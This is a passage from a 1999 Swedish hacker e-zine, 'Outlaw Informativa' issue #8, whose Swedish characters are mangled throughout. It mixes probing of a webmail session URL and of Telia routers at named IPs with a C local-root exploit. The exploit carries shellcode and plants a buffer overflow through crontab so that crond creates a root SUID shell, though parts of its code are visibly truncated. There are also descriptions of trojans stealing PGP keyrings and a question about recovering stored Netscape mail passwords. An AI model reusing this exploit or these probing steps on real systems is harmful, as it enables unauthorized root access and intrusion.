<20>r url:en till en fil.
Detta funkade n<>r jag va inloggad trycker jag p<> logout button i deras script
baserade webmail s<> har ingen access till url:en l<>ngre. Men om jag ist<73>llet
skiter i att trycka p<> logout, s<> har alla access till min inbox, detta
bygger iofs p<> att den som vill rota i n<>gons privata liv m<>ste ha tillg<6C>ng
till url:en. Det jag inte vet och det jag vill veta fr<66>n er <20>r om denna summa
eller teckensamling:
c8116dca1e48dd76379f7582197293fa
<20>r det ett krypterat l<>senord eller en checksum eller liknande f<>r deras
cgi/perl script. Om det <20>r ett krypterat l<>senord i s<>nna fall, vilken
algoritm andv<64>nder dom ? .. Hur tar jag reda p<> det ?
Jag skickade ett email och fr<66>gade lite diskret hur h<>g s<>kerhet jag har och
vad f<>r algortim dom andv<64>nder, dom svarade:
We never give out our encryption methods, but I can assure you that we are
among the safest in the industry.
wm
m.com
On 12 Sep 1999, anon wrote:
> Date: 12 Sep 1999 05:35:36 -0700
> From: anon <xxxx>
> To: xxxx@marijuana.com
> Subject: how high is my security ?
>
> Hi!
> I<>m sending you this e-mail because i want to know how high security i have because
> i dont want anything bad to happen to me or my e-mail. So i wounder
> what algorithm you use to encrypt my e-mails and if you are using a commercial,
> in that case, wich one? and if you are using your own, how safe is it for me to use?
>
> thanks.
>
> // X
S<> p<> n<>got s<>tt m<>ste jag f<> reda p<> vad dessa siffror och bokst<73>ver i
url:en till inboxen <20>r, det <20>r det jag beh<65>ver veta f<>r att g<> vidare.
-----------------------------------------------------------------------------
Funderingar kring Telia
-----------------------------------------------------------------------------
Detta <20>r ocks<6B> lite fr<66>gor som jag vill f<> reda p<> i denna artikel, som ni
sj<73>lvklart m<>ste svara p<> om ni kan dom :)
Jag testade att g<>ra en traceroute p<> mig sj<73>lv av ren tr<74>kighet och en av
de maskinerna som paketen som kommer fr<66>n min dator som paserar maskinen va:
ny-b1-pos5-0-0.telia.net (209.95.159.22)
Jag testade att telnetta til maskinen [209.95.159.22] och fick d<> en login
prompt, som s<>g ut s<> h<>r:
-------------------------
User Access Verification
Username:
-------------------------
En sak jag klurar <20>ver <20>r om hosten [ny-b1-pos5-0-0.telia.net] har n<>gra
synonymer som betyder n<>gon som kan ge mig information vad maskinen andv<64>nds
till, om det <20>r en router/firewall/proxy eller liknande.
De portar p<> maskinen som va <20>ppnade:
79 Finger
23 Telnet
De som var filtrerade, allts<74> de som <20>r bevakade av <20>n Firewall <20>r:
137 netbios-ns (vad st<73>r ns f<>r?, namserver ?)
138 netbios-dgm (vad st<73>r dgm f<>r ?)
139 netbios-ssn (Vad st<73>r ssn f<>r ?, SecureSecuredNetwork =) ?)
Detta tyder p<> att dom andv<64>nder NT, alla LAMA f<>retag andv<64>nder
NT, det <20>r *NIX som g<>ller. Men kan ocks<6B> andv<64>na Unix men ocks<6B> b<>de
och, det <20>r det som jag ocks<6B> vill f<> reda p<>. Jag testade att logga in p<>
ett telia konto p<> servern, det gav:
Jag testade att telnetta till finger porten (79) och fick d<> fram mitt eget
hostname, vilket tyder p<> att det <20>r n<>gon slags packet filter eller n<>t.
Line User Host(s) Idle Location
* 2 vty 0 idle 00:00:00 xxxxxxxxx.telia.com
vty, ska st<73> f<>r n<>t med Virtual Terminal iafs.
idle st<73>r f<>r hur l<>nge sedan usern knappade p<> controllern, dvs tangentbo-
rdet.
Detta ser ut att vara n<>gon slags PPP station och antagligen n<>r man kommuni-
cerar mellan hemnumret till Telia s<> g<>r informationen mellan olika datorer i
Telias n<>tverk som hanterar uppkopplingsf<73>rbindelserna osv.
Testa att telnetta till 209.95.159.21, vilket ger samma Login prompt som
209.95.159.22. Som tyder p<> att det <20>r en rad datorer eller maskiner (typ
packet filter osv.) som styr uppkopplingen och kommunikation fr<66>n min dator
genom telias n<>tverk till n<>sta dator, typ:
____ _ _ .------. _ _ ____
| |=========>|*|-->|*|--->|------|-->|*|-->|*|===>| |
|PC1 | | | |NT <20>| | | |xxx |
|____|<=========|*|<--|*|<---|Serv <20>|<--|*|<--|*|<===|____|
<20> <20> '------' <20> <20>
PC1: En persondator
_
|*|: Sm<53> applikationer som h<>r till telias n<>tverk, typ ppp stationer som
<20> hanterar uppkopplingar och f<>rbindelser. En sak som <20>r s<>ker <20>r att
Telia har ett antal ATM v<>xlar som IP:et g<>r igenom.
NT : Telias Windows NT server.
Serv
xxx: Datorn som inneh<65>ller filer f<>r transmissionen, t.ex. FTP servern som
du ska h<>mta ner Slackware 4.0 ifr<66>n eller helt enkelt t.ex. Aftonblade-
ts hemsida, v<>lj sj<73>lv.
Ok, nu testar vi en annan dator...
209.95.159.5 [sf-i2.telia.net]
Jag testar att telnetta, vilket ger en login prompt..precis som n<>r jag
telnettade till 209.95.159.22 och 209.95.159.21.
Jag testade sedan att telnetta till Chargen(19) vilket genererade en massa
tecken som aldrig tog stopp, i den h<>r stilen:
------------------------------------------------------------------------
!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefg
!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefgh
"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghi
#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghij
$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijk
%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijkl
&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklm
'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmn
()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmno
)*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnop
*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopq
+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqr
,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrs
-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrst
./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstu
/0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuv
0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvw
123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwx
23456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxy
3456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz
------------------------------------------------------------------------
Enligt uppgifter har jag h<>rt att chargen andv<64>nds f<>r att kontrollera
hastigheten i en anslutning. De kan <20>ven utnyttjas f<>r DoS attacker.
Hmm, jag testar att g<>ra en traceroute p<> 209.95.159.5:
1 167 ms 228 ms 174 ms md4690401.utfors.se [212.105.4.1]
2 162 ms 152 ms 157 ms br-00-00.utfors.net [195.58.102.1]
3 151 ms 154 ms 155 ms 195.58.100.50
4 * 266 ms 233 ms Hssi11-1-0.GW2.STK2.ALTER.NET [146.188.32.121]
5 249 ms * * 422.ATM6-0-0.CR1.STK2.Alter.Net [146.188.5.65]
6 347 ms 350 ms * 219.ATM5-0.BR1.NYC5.Alter.Net [146.188.7.110]
7 671 ms 733 ms 745 ms 431.ATM5-0.GW2.NYC5.ALTER.NET [137.39.30.141]
8 868 ms 920 ms * 152.ATM2-0.XR1.NYC1.ALTER.NET [146.188.177.246]
9 * * 875 ms 195.ATM6-0.XR1.NYC4.ALTER.NET [146.188.178.82]
10 714 ms * 614 ms 189.ATM3-0.GW8.NYC4.ALTER.NET [146.188.180.49]
11 268 ms 314 ms 259 ms Telia-gw.customer.ALTER.NET [157.130.5.74]
12 257 ms 258 ms 255 ms ny-b1-atm3-0-101.usa.telia.net [209.95.129.69]
13 381 ms 336 ms 330 ms sf-b1-pos0-0.telia.net [209.95.159.21]
14 460 ms 331 ms 345 ms sf-i2.telia.net [209.95.159.5]
ATM <20>r ju en v<>xel f<>r transmission i N<>tverk, intressant. Det tyder stor p<>
att det <20>r en ATM v<>xel. Om du telnettar till t.ex. 146.188.178.82 (troligtv-
is en ATM v<>xel) s<> f<>r du en login prompt.
-----------------------------------------------------------------------------
Skapa SUID Shell
-----------------------------------------------------------------------------
#!/dev/null
## By ncode -99
## Detta skrevs av ren tr<74>kighet, hoppas n<>n l<>r sig.
## Detta programmet skapar ett suid shell(/tmp/XxX) <20>t dig.
## Men root m<>ste k<>ra det f<>r annars blir det ente suid.
## Om det k<>nns f<>r fattigt kan du alltid k<>ra 2.c
## Det <20>r kodat av Dillon.
<-- - - - - - - - -start of login.sh - - - - - - - - -->
cp /bin/bash /XxX
chmod 4755 /tmp/XxX
<-- - - - - - - - -end of login.sh - - - - - - - - -->
<-- - - - - - - - -start of 2.c- - - - - - - - -->
/* Detta g<>r ungef<65>r samma sak som login.sh */
/* Kompilera 2.c och d<>p om a.out till n<>tt trevligt */
/* D<>refter ska bara root k<>ra det */
#include
#include
#include
#include
#include
#define DEFAULT_OFFSET 560
#define DEFAULT_BUFFER_SIZE 980
#define TOTAL_BUFFER 4096
char shellcode[]=
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07"
"\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12"
"\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8"
"\xd7\xff\xff\xff/tmp/xo";
long get_esp(void) {
__asm__("movl %esp,%eax");
}
void calc_bs(int *bs_ptr)
{
int len=0;
struct passwd *p_name;
/* dependant on length of username */
p_name=getpwuid(getuid());
len=strlen(p_name->pw_name);
*bs_ptr = 986 - len;
return;
}
int main(int argc, char **argv) {
char *buff = NULL;
unsigned long *addr_ptr = NULL;
char *ptr = NULL;
int i, ofs=DEFAULT_OFFSET;
int bs=DEFAULT_BUFFER_SIZE;
FILE *fp=NULL;
/* probably will not need to give argument */
if (argc==2)
ofs=atoi(argv[1]);
calc_bs(&bs);
buff=malloc(TOTAL_BUFFER);
if(!buff) {
perror("malloc");
exit(EXIT_FAILURE);
}
ptr=buff;
memset(ptr,0x90, bs-strlen(shellcode));
ptr += bs-strlen(shellcode);
for (i=0; i\n");
fprintf(fp,"#include \n");
fprintf(fp,"main() {\n");
fprintf(fp,"\tsystem(\"/bin/cp /bin/sh /tmp/XxX\");\n");
fprintf(fp,"\tsystem(\"chown root /tmp/XxX\");\n");
fprintf(fp,"\tsystem(\"chmod 4755 /tmp/XxX\");\n");
fprintf(fp,"}\n");
fclose(fp);
/* compile our program to create suid shell */
system("cc -o /tmp/xo /tmp/xo.c");
unlink("/tmp/xo.c");
/* now use crontab to plant overflow for crond */
fp=fopen("r00t","w+");
if (!fp) {
perror("fopen");
exit(EXIT_FAILURE);
}
fprintf(fp,"%s\n",buff);
fclose(fp);
/* put our r00t crontab in crontabs directory */
system("/usr/bin/crontab r00t");
unlink("r00t");
/* helpful reminder */
printf("Now wait about 1 minute and look\n");
printf("for the suid shell -> /tmp/XxX\n");
exit(0);
}
<-- - - - - - - - -end of 2.c- - - - - - - - -->
-----------------------------------------------------------------------------
Enkelt om 2 olika Trojaner
-----------------------------------------------------------------------------
[F<>rord]
Jag t<>nke skriva enkelt om hur trojanerna Caligula och Picture.exe fungerar
och vilket syfte de andv<64>nds till.
En trojan <20>r en k<>rbar fil som inneh<65>ller n<>got som inte en X vet om, och som
i syfte andv<64>nds f<>r att f<> full access till en dator f<>r att t.ex. f<> tag i
Private Nycklar, Krypterade Filer, Hemligheter och L<>senord (typ .pwl)
[Caligula]
Caligula <20>r en trojan som ocks<6B> kan betraktas som ett virus eftersom den inte
f<>rst<73>r n<>got. Caligula <20>r sl<73>ppt av Codebreakers f<>r er som inte visste.
Viruset eller Trojanen <20>r i sj<73>lva v<>rket ett Macro Virus som f<>rst tar reda
p<> var du installerat PGP (Pretty Good Privacy) genom att <20>ppna register
nyckeln: HKEY_CLASSES_ROOT\PGP Encrypted File\shell\open\command.
N<>r den hittat var PGP <20>r installerat letar den efter secret key ring (/PGP
Keyrings/secring.skr) och n<>r den hittat den kopierar Caligula din secret key
ring och laddar upp den p<> Codebreakers ftp (208.201.88.110 eller ftp.codebr-
eakers.org) i "incoming" katalogen.
Efter ha k<>rt Caligula skapar den en register nyckel i:
HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info\Caligula
och "value" till [1]
Om du vill veta om du <20>r infekterad av Caligula kan du ju enkelt ta en titt
i registret, som alla vet s<> <20>r Unix f<>r s<>kert f<>r att g<>ra en trojan som
st<73>djer Linux, jo det <20>r sj<73>lvklart att det finns. Men antalet trojaner som
finns f<>r Windows 9x och Windows NT <20>r <20>verl<72>gset. Trojaner f<>r Unix andv<64>nds
ocks<6B> ofta i ett annat syfte <20>n en trojan f<>r Windows.
[Picture.exe]
Picture.exe <20>r en Trojan som skickas som bifogande via email. Picture.exe kan
ocks<6B> ses i namnet Manager.exe. Om du nu skulle <20>ppna Picture.exe s<> plasera-
r den en liten fil i c:\Windows som heter note.exe ocks<6B> en rad i win.ini
(c:\Windows\win.ini) som ser ut s<> h<>r: RUN=NOTE.EXE. F<>r er som inte fattar
s<> startar trojanen som <20>r d<>pt till note.exe varje g<>ng Windows startar, sen
skapar den en fil i c:\Windows\$2321.dat, som inneh<65>ller en krypterad uppr<70>k-
ning av alla filtill<6C>gg i katalog-tr<74>det, som startar med h, i, m, p, s eller
t. Jag orkar inte f<>rklara hur kryptering fungerar, det kan ni l<>sa i ISS.
Den letar efter sidor som offret varit p<> och email addresser, b<>de lokala
och folk offret mailat. Sen testar trojanen att connecta till olika SMTP
servers och bli bekr<6B>ftad. Picture.exe tar allts<74> kortfattat reda p<> en massa
information om din dator som kan andv<64>ndas f<>r angrepp och dataintr<74>ng.
-----------------------------------------------------------------------------
Brev ang<6E>ende telias r<>tt om spr<70>rning
-----------------------------------------------------------------------------
To: xxx@xxxxxx.com
From: xxx@telia.se
Subject:
Fr<46>n Telias sida kommenterar vi inte i vilka sammanhang och hur vi g<>r
tillv<6C>ga f<>r att avsl<73>ja de personer som utnyttjar ett internetkonto
obeh<65>rigt. Den enda kommentaren jag <20>r beredd att ge dig <20>r att alla
som anv<6E>nt ett internetkonto finns registrerade samt att Telia har r<>tt
att anv<6E>nda denna information f<>r att vidtaga l<>mpliga <20>tg<74>rder. Vill
u diskutera detta ytterligare h<>nvisar jag dig till chefen f<>r v<>r
avdelning, Internets<74>kerhetsutredningar, Lennart Andersson som tr<74>ffas
p<> tel xxx-xxxxxx
-----Ursprungligt meddelande-----
Fr<46>n: xxx@xxxxxx.com [xxx@xxxxxx.com ]
Skickat: den xx xxxx 1999
Till: xxx@telia.se
T<>nkte bara h<>ra om era r<>ttigheter f<>r sp<73>rning fortfarande <20>r lika
meningsl<73>s? Min polare blev drabbad av dessa ligister som anv<6E>nder s<>
kallade felias (vilket i min mening <20>r helt omoraliskt) och efter 3
m<>naders v<>ntan och nerskrivning av online tider s<> kom telia fram till
att hans konto blev (ab)used men de hade inte resurserna till att
sp<73>ra.. Skulle verkligen bli glad om du l<>ste igenom bifogad fil och
kommenterade korrekt respektive inkorrekt information..
Tack p<> f<>rhand..
-----------------------------------------------------------------------------
Linux f<>r dumma, del #1
-----------------------------------------------------------------------------
Eftersom jag studerar just <20>mnet Linux/Unix nu s<> t<>nkte jag b<>rja p<> en
liten serie med olika delar kring Linux/Unix, f<>rhoppningsvis b<>de avancerat
och grundl<64>ggande. Dessa serier kommer vara skrivna helt f<>r min egen skull.
S<> kom inte och klaga.
[Katalogstrukteren]
/ - Rooten
/boot - Boot
/bin - Binary
/dev - Devices
/etc - Etc
/home - Home
/lost+found - Lost+found
/lib - Library
/mnt - Mounted
/proc - Proc
/root - Root
/sbin - Sbin
/tmp - Temporary
/usr - User
/var - Variable
-[ / ]-
Rooten inneh<65>ller inte n<>got speciellt f<>rutom alla andra Bibliotek.
-[ /boot ]-
I /boot ligger n<>stan allt som har med kerneln att g<>ra. Denna heter vlinuz
eller vmlinuz-(version) och p<> vissa system <20>ven zImage. H<>r ligger <20>ven kart
filer som h<>ller reda p<> ditt system.
-[ /bin ]-
bin = binary = bin<69>rt. /bin <20>r ett bibliotek reserverat f<>r programfiler, och
inte den enda (se l<>ngre ner i artikeln) Just i detta bibliotek ligger
kommando-program, s<> som typ ls, login, kill osv.
-[ /dev ] -
dev = devices. H<>r ligger filer som representerar gr<67>nsnitt p<> datorn, typ
floppyn, cdromen, zipdriven, n<>tverks kortet osv. Om du nu t.ex. vill mounta
floppyn skriver du.
# mount -t msdos /dev/fd0 /mnt/floppy
Biblioteket /mnt specifieras l<>ngre ner.
-[ /etc ]-
Inneh<65>ller alla konfigurations filer f<>r olika program och tj<74>nster, <20>ven
startfilerna (/etc/rc.d) och krypterade l<>senord (/etc/shadow)
-[ /home ]-
Inneh<65>ller alla hem bibliotek f<>r olika users.
-[ /lost+found ]-
I detta bibliotek l<>gger systemet alla filer och delar av filer som den
hittar n<>r den st<73>dar h<>rdisken.
-[ /mnt ]-
Reserverat bibliotek f<>r monterade partioner/cdrom/floppy osv, t.ex.
# cd /mnt
# ls
hda1 hda2 floppy cdrom
Iofs kan du montera t.ex. en floppy i vilket bibliotek du vill, men /mnt <20>r
reserverad f<>r det.
-[ /proc ]-
Detta biblitek inneh<65>ller inte n<>got fysiskt filsystem, utan ett virtuellt
system som h<>lls av prim<69>rminnet. Biblioteket inneh<65>ller information om syst-
emet som m<>nga bin<69>ra filer andv<64>nder sig av. Du kan sj<73>lv kolla genom att
ge kommandot
more /proc/interrups
-[ /root ]-
Detta <20>r en hem bibliotek f<>r sj<73>lvaste admin (root, superuser). Admins hem
bibbla ligger i ett separat bibliotek och inte i /home biblioteket.
-[ /sbin ]-
Inneh<65>ller installation/konfigurations verktyg som endast admin(root) kan
andv<64>nda, verktyg s<> som fdisk, xf86config osv.
-[ /tmp ]-
tmp = Temporary, /tmp <20>r ett bibliotek f<>r tempor<6F>ra filer. Fungerar precis i
samma syfte som c:/Windows/temp i Windoze 95.
-[ /usr ]-
Inneh<65>ller i stort s<>tt alla program p<> hela Native partitionen. /usr biblio-
teket <20>r uppdelat i olika delar...
/usr/bin - Alla bin<69>ra filer
/usr/lib - Alla librarys
/usr/doc - Dokumentation f<>r alla program
/usr/man - Manualer f<>r alla program (samma som ovan)
-[ /var ]-
var = variable, men iafs...h<>r ligger filer som varierar i storlek. Kan du
komma p<> n<>gon ? ..inte, jaja...men typ Loggfiler, l<>sfiler, PID-filer som
inneh<65>ller information om programs processnummer.
[Vad <20>r Swap f<>r n<>got?]
Det finns m<>nga som inte vet vad Swap <20>r f<>r n<>got. Jag t<>nkte ber<65>tta s<>
enkelt s<> m<>jligt vad det <20>r och vad det andv<64>nds till. Swap <20>r ett
Virtuellt minne som hj<68>lper till n<>r de fysiska minnet inte r<>cker till.
Det f<>rsta datorn g<>r n<>r den arbetar <20>r att ta till processorn, n<>r proces-
sorn inte r<>cker till hj<68>lper de fysiska minnet till (det <20>r d<> det b<>rjar
rassla i datorn) och n<>r inte de fysiska minnet r<>cker till hj<68>lper Swap
minnet till.
[Hur reagerar Linux n<>r en andv<64>ndare inte har tillg<6C>ng till ett kommando?]
Det finns m<>nga olika kommandon i Linux, en del f<>r endast andv<64>ndas av
admin och en del <20>r <20>ppna f<>r alla, hur reagerar Linux p<> detta ?
praktisera...
$ adduser
bash: adduser: command not found
H<>r ger bash utdata att kommandot inte finns. Men du vet ju var kommandot
adduser finns, ok..vi testar att g<> till biblioteket d<>r sj<73>lv kommandot <20>r
lagrat.
$ cd /sbin
$ adduser
bash: /sbin/adduser: Permission denied
Jippi!, h<>r st<73>r i alla fall att du inte har tillg<6C>ng till kommandot inte f<>r
andv<64>ndas av n<>gon annan en admin (root).
-----------------------------------------------------------------------------
Ins<6E>ndare
-----------------------------------------------------------------------------
Denna sektion kommer i framtiden dyka upp n<>r det kommer in fr<66>gor och <20>sikt-
er ang<6E>ende Heretics Inc. och Underground.
--> Netscape 4.05 (Messenger) kryptering
Nu <20>r det jag som har en fr<66>ga, eftersom det inte <20>r n<>gon <20>n som har
skickat in n<>gra fr<66>gor. Men jag undrar om det <20>r n<>n som vet n<>gon
dokumentation eller c-script som har med algoritmen som krypterar
Netscape Messenger i Netscape Communicator 4.05. Jag har m<>rkt att om
du v<>ljer att Messenger ska komma ih<69>g l<>senordet till din mailserver
s<> sparas det i en fil /users/username/prefs.js. Kolla raden nedan
hur du nu hittar det krypterade l<>senordet.
user_pref("mail.pop_password", "krypterat passwd");
user_pref("mail.remember_password", true);
F<>rsta raden handh<64>ller det krypterade l<>senordet och den andra om du
valt att composer ska komma ih<69>g ditt l<>senord till ditt konto p<>
mailservern. F<>rsta raden finns allts<74> inte om du inte har satt andra
raden till "true"
diox1de@hacksweden.com
-----------------------------------------------------------------------------
Avslutning
-----------------------------------------------------------------------------
Ja, nu var det slut f<>r detta nummer, b<>ttre information i n<>sta :)
O U T L A W I N F O R M A T I V A
issue #8
Produced and (c) Heretics Incoperated.
Time/Date: 22:45 1999-10-09
"Magic is a push/pull situation, like the universe itself. While one is
pushing, he cannot pull. The purpose of a ritual is to "push" the des-
ired result within a unique span of time and space, then move away and
"pull" by divorcing oneself from all thoughts and related acts previo-
usly ritualized."
Knowledge is power, with no power you never get Knowledge
- Heretics Inc.
-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 6.0.2i
iQA/AwUBN5zSsnRmgGlPBhFaEQLQngCgjAdjJAjiAqYXs9YTnGFjd0/VaXYAnj+Q
X3pmKDomoNWBQp8LyYIdwbqm
=estT
-----END PGP SIGNATURE-----